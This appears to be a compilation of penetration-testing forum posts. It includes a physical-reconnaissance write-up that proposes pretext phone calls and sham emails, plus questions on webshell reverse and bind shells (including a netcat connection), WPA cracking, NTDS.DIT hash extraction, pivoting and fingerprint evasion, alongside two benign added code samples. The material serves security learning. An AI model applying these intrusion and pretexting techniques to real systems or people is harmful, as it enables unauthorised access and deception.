http://i42.tinypic.com/35d2rmb.jpg

Hmm... vandalism? Maybe they are not doing such a good job. Here I could make a telephone call or send a sham email from a competing security guard services provider, or maybe even send an email from Securitas themselves, and use the vandalism examples as the basis for a proposal for increased patrolling, and in the process implement an attack similar to the one with the antenna problem.

http://i42.tinypic.com/9idyk4.jpg

The lights are turned on at 3:00 in the morning?
Nice, a whiteboard. Here I learnt about important topics which are evidently under discussion at this business. In this case they were looking for buyers for a telephone directory service. This is something which I could avail myself of, such as sham interest in this product as a pretext to gain more info or maybe even access (which I eventually did).

Conclusion

In just 30 minutes I acquired a good chunk of information without any keystrokes, which aided me very well later on in the attack. I am happy to announce that I successfully penetrated several computers at this company using mostly what I observed at the physical site. I proposed the following solutions to them:
1. Use paper shredders
2. Turn your damn lights off.
3. Be more circumspect with phone calls and emails pertaining to problems visible from the outside.

If you live in the same or an adjacent city you could give this a try. It's quite a thrill.

I have a client with an older Fedora box. They allow external connections via the built in remote desktop sharing (vino-server). I've been asked to audit the vnc connections to the box for the past 3 months.

I didn't set up the machine, so I'm not sure what options have been configured for logging. Does anyone know if there are any default VNC logs, or where I can start looking for connection logs for port 5900?

Hey guys, I have seen lots of documents about how to hack and I've tried many exploits on my test server (an HP ProLiant DL380 G3 I got off eBay :D). But I've never tried rooting it before :S I looked around Google but only found outdated papers from the 90s lol. I have seen webshells like c99 and r57, with options like "connect back" and "bind shell". I've looked into it and found that for "connect back" you have to port forward if it's a remote host connecting to you, but not if it's on the LAN. "Bind shell" is me doing "nc <ip> <port>", which is usually blocked by firewalls?

So people say "connect back" shells are the best, but don't they show your IP address? Also, I've heard of data pipe shells, which have something to do with IRC?

Last week I decided to check if my network was secure "enough". I got my WPA Handshake within seconds (which is quite acceptable). I then got down to trying to crack it.

I used all the dictionaries I could get my hands on to try and brute-force my way in, but found nothing. So far so good. But I still wasn't convinced.

Through some social engineering, and after a few pints of lager, I tricked myself into telling me that the password was made of a 10 digit mixture of letters and numbers. I therefore tried a different way:

After something like 4 days of scanning 385 keys/second it had barely just started the 3rd digit. This made me feel a lot safer.

Question: Are there "faster" ways other than crunch to get to a 10 digit password by checking every possible permutation, or may I assume that no one is going to have the time to crack my password (at least for the next few hundred years)?
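The feeling of safety in this post can be turned into numbers. The following is an added example, not part of the original thread: it computes the size of the candidate space for a passphrase of a given length and alphabet, how long an exhaustive search takes at a measured rate (the poster's 385 keys/second), and what fraction of the space a run of a given duration has covered. The alphabet sizes (36 for lowercase alphanumeric, 62 for mixed case) are assumptions about what "letters and numbers" means.

```python
from datetime import timedelta

# Added example: passphrase keyspace and exhaustive-search time estimates.
SECONDS_PER_YEAR = 365.25 * 24 * 3600

# Assumed alphabet sizes; the original post does not say whether
# letters were mixed case.
LOWER_ALNUM = 26 + 10   # a-z, 0-9
MIXED_ALNUM = 26 + 26 + 10  # a-z, A-Z, 0-9


def keyspace(charset_size: int, length: int) -> int:
    """Number of candidate passphrases of exactly `length` characters."""
    return charset_size ** length


def seconds_to_exhaust(charset_size: int, length: int,
                       keys_per_second: float) -> float:
    """Worst-case time to try every candidate at a fixed rate."""
    return keyspace(charset_size, length) / keys_per_second


def years_to_exhaust(charset_size: int, length: int,
                     keys_per_second: float) -> float:
    return seconds_to_exhaust(charset_size, length,
                              keys_per_second) / SECONDS_PER_YEAR


def fraction_searched(charset_size: int, length: int,
                      keys_per_second: float, elapsed: timedelta) -> float:
    """Share of the keyspace covered after `elapsed` at the given rate."""
    tried = keys_per_second * elapsed.total_seconds()
    return min(1.0, tried / keyspace(charset_size, length))


def dictionary_seconds(word_count: int, keys_per_second: float) -> float:
    """Time to exhaust a wordlist: this is why dictionaries finish quickly."""
    return word_count / keys_per_second


if __name__ == "__main__":
    rate = 385.0  # keys/second, as measured in the post
    for name, size in (("lowercase+digits", LOWER_ALNUM),
                       ("mixed case+digits", MIXED_ALNUM)):
        print(f"{name:18} 10 chars: {keyspace(size, 10):.3e} candidates, "
              f"{years_to_exhaust(size, 10, rate):,.0f} years at {rate:g}/s")
    covered = fraction_searched(LOWER_ALNUM, 10, rate, timedelta(days=4))
    print(f"after 4 days: {covered:.2e} of the lowercase space searched")
    print(f"a 10M-word list takes {dictionary_seconds(10_000_000, rate)/3600:.1f} h")
```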

Hello, I posted this in the OffSec PWB forum, but I don't think it's frequented that often hence no response. Apologies for the re-post if you've already come across this.

I've been doing some research into TCP wrappers recently, having noticed that a few services within the PWB lab are wrapped. As I understand it, TCP wrappers are a method of applying an ACL to a service based on IP address.

I've figured out that I can only talk to wrapped services if I'm bouncing through another host, but is there a reliable way of determining which hosts are in the ACL? The only ideas I've had on this so far seem to require some cache poisoning, which seems more than likely to mess things up (and poisoning is not allowed in the labs anyway!).

Spoofing my source address could be an option I suppose, but that would mean responses are directed elsewhere I guess...

Can anyone share any insights into this? Even a nudge in the right direction would be appreciated.

Hello all,
So a professor of my Computer Security course, together with the campus IT director, have offered my class a challenge. They've placed a file (aptly named secret.txt) with a secret word/phrase/something in a protected folder, and are offering extra credit if we can figure out what that word is. We aren't allowed to destroy anything or inhibit use of the server to other students, but past that anything (sans physical coercion and blackmail) goes.

The server is running SunOS 5.9. The folder, and all files within it that I know of, have 700 permissions, and both accounts I have access to are in the students group, whereas he's in the faculty group. We can print the shadowed /etc/passwd, but permission is denied to read or copy /etc/shadow.

We'll get credit whether we get caught or not, but ideas that get the secret word without alerting anybody are preferable. I'm familiar with unix/linux, but not so much with penetrating it. I come to you asking for advice and guidance in things to learn about that would aid me in this endeavor.

I know this might sound pretty noobish to some of you professionals, but what is the best way to determine what exploits will work on a victim machine? I know nmap is good for finding ports, but what is the method everyone uses to know which exploit to choose that will apply? I am running boxes with Win XP SP2 and SP3, and my host with BT4 final.

I need help. I am searching for a tool that could list all subdomains for a target domain, e.g. .edu.*; I would like to collect all subdomains of this target. For example, I tried goorecon but it returned only 60 subdomains for my target, whereas when searching manually through Google I found 200 subdomains.

Hi, I am doing some Pentesting at school with full permission of the target and the school. I am trying to either exploit it or use social engineering. I would prefer to try and exploit it because that would be more immediate. I looked in the exploit database but did not find an exploit. If either you can point me to an exploit in the database or some other form of exploit I would appreciate it. MITM is an option but I would prefer not to do that as I do not want to try it on a production network even though I am allowed to.

So I've been working with Metasploit on normal internal networks at home. Everything works great there. Now I wanted to go to the next level and see how everything works on a domain. So I've set up a small server at home and a domain to log into. I have a client log onto the server. I connect to this client using Meterpreter, etc. etc. So up to now everything was jolly. Now when I try to take over the root account or SYSTEM on the computer that I've exploited, I can't migrate to SYSTEM. I think it has something to do with the fact that I'm logged onto the server and not the local account. Any idea on how to compromise the local account? Or even better, the server that the computer is logged into?

I have tried to use windows/browser/ie_aurora.
My internet connection is by a router, so my public IP address is different from the local one.
So when I use ie_aurora it works fine if I use 192.168.1.104 (local intranet address) but if I use my public address like 82.34.XXX.XXX as SRVHOST and LHOST:

During a recent discussion with co-workers over lunch, the topic of offensive security came up. Preferring offensive security over anything else, I chimed in and explained the glorious differences in study and skill development methods between offensive and defensive security ideologies.

Offensive security and everything it encapsulates can be seen as a sport. There are techniques, tricks, methods, styles, different platforms, etc., all at your disposal to use to your liking. You're taking your keyboard and turning it into a controller that can potentially do as much damage as you allow yourself to learn. Offensive security can be practiced. You can even increase the speed at which you attack. The list goes on.

Defensive security is boring. It's preventive. Write your policies, set up your controls, audit, report. ZZZZZ. Is this what I got into security for? No. Hardly. Not even close, in fact. Anyway...

It came to mind that if offensive security can be considered a sport, why not train like an athlete? Yes, it's good to know the general concepts, tools, and how to use them, but how is that really effective in today's fast paced cyber-terrorism world? If you're not trained to detect, react, and attack appropriately, you're bound to become useless. The combination of both knowledge and disciplined ability will be invaluable.

I would imagine that a training curriculum for offensive security could take the security skills you already have, and hone them into militant abilities and at the same time, teach new methods. Not only would there be a program to follow for disciplined learning, but common offensive security tasks as well as attacks would become so ingrained into an individual, they would never have to stop, hesitate, or look up a procedure that was merely foggy or forgotten.

Right, I'm doing a little pentest on my AP, which uses WPA-PSK.
I used my netbook to run BT4, then I successfully de-authed my targeted workstation (my desktop using Wi-Fi) and captured the 4-way handshake into a capture file.
I then used the default aircrack word list (password.lst) to try and crack the handshake.

I then get KEY FOUND [ penelope]
I assume this means all is good and it's been cracked; however, I know this is not the password, as it's set to "Chronicles2"

Yet doing another capture from my same BSSID, aircrack still tells me this is the key.

Why does aircrack tell me this is the key?
Thanks.
I do have permission to crack the WPA passcode as I own the network, pay the bill and set up the AP. Just in case anyone asks =]

Since I have the server and backups I would have access to the NTDS.DIT file; is there a way to extract password hashes directly from it? I'm trying to avoid running LC or fgdump on the Active Directory domain controller.

I have a training lab set up and I am having trouble trying to double pivot. I have a firewall exposing an FTP server; I have exploited the FTP server, scanned internally, and found some hosts. I set up a pivot through the FTP server and exploited a host; this host has a second NIC and another host behind it. I have set up another route through the host, but I cannot get any of my exploits to work against the second host.

Just wondering if anyone has done this before, or if it is even possible to double up pivots.

Suppose you wanted to fool OS fingerprinting tools such as xprobe, nmap, etc. in order to make the initial information gathering phase harder.
In BSD you can set net.inet.udp.blackhole or even better, use pf's traffic normalization options.
Even the Windows world has seen a few tools to make your win* box appear as running a different OS.
In Linux, on the other hand, we had IPpersonality (ippersonality.sourceforge.net), iplog (ojnk.sourceforge.net) and morph (synacklabs.net) but they're now quite old and only work with 2.4 kernels.
So I was wondering if any of you can suggest alternatives? pf for linux anyone? :rolleyes:

Hi,
I hope this is the right place to ask this.
When I use Metasploit it works very well on my local network,
but when I want to pentest outside my local network it doesn't work.
Can someone tell me why?

First let me say, yes, I know this isn't an nmap support forum, and that if nobody here knows the answer to my question I will go ask on an nmap mailing list or something.

To the point. I'm wondering if anyone knows the scope of Nmap NSE scripts? Are they always associated with a port, or are there host level NSEs as well? Think of this from the perspective of parsing Nmap XML output.

Personally I've only seen NSE output related to a port, but that doesn't mean that there isn't host level NSE output that I just haven't managed to trigger yet.
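Nmap's XML output does keep the two kinds apart: port-level (portrule) script results are `<script>` children of the `<port>` element, while host-level (hostrule) results sit under a separate `<hostscript>` element inside `<host>` (prerule and postrule output goes under `<prescript>`/`<postscript>` at the `<nmaprun>` level). The parser below is an added example, not code from the thread; the XML document it parses is a constructed sample in Nmap's format, not a real scan.

```python
import xml.etree.ElementTree as ET

# Constructed sample in Nmap's XML layout (not real scan output).
SAMPLE_XML = """
<nmaprun scanner="nmap" args="nmap -sV -sC -oX scan.xml 192.0.2.10">
  <host>
    <status state="up" reason="echo-reply"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH"/>
        <script id="ssh-hostkey" output="2048 SHA256:constructed (RSA)"/>
      </port>
      <port protocol="tcp" portid="445">
        <state state="open" reason="syn-ack"/>
        <service name="microsoft-ds"/>
      </port>
    </ports>
    <hostscript>
      <script id="smb-os-discovery" output="OS: Windows XP (constructed)"/>
    </hostscript>
  </host>
</nmaprun>
"""


def nse_results(xml_text: str) -> dict:
    """Map (host address, scope, script id) -> script output.

    scope is 'host' for hostrule scripts and 'proto/port' for portrule ones.
    """
    root = ET.fromstring(xml_text)
    results = {}
    for host in root.iter("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        # Port-level scripts: nested under each <port>.
        for port in host.iter("port"):
            scope = f"{port.get('protocol')}/{port.get('portid')}"
            for script in port.findall("script"):
                results[(addr, scope, script.get("id"))] = script.get("output")
        # Host-level scripts: under <hostscript>, not tied to any port.
        for script in host.findall("hostscript/script"):
            results[(addr, "host", script.get("id"))] = script.get("output")
    return results


def host_level_ids(results: dict) -> set:
    """Script ids that produced host-level output."""
    return {sid for (_, scope, sid) in results if scope == "host"}
```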

I was recently asked a question about ODBC connections to a SQL server and the possibility of MITM or sniffing attacks. Can someone point me to something that discusses this? I've had a hard time finding much about it, hopefully someone here can dump some knowledge.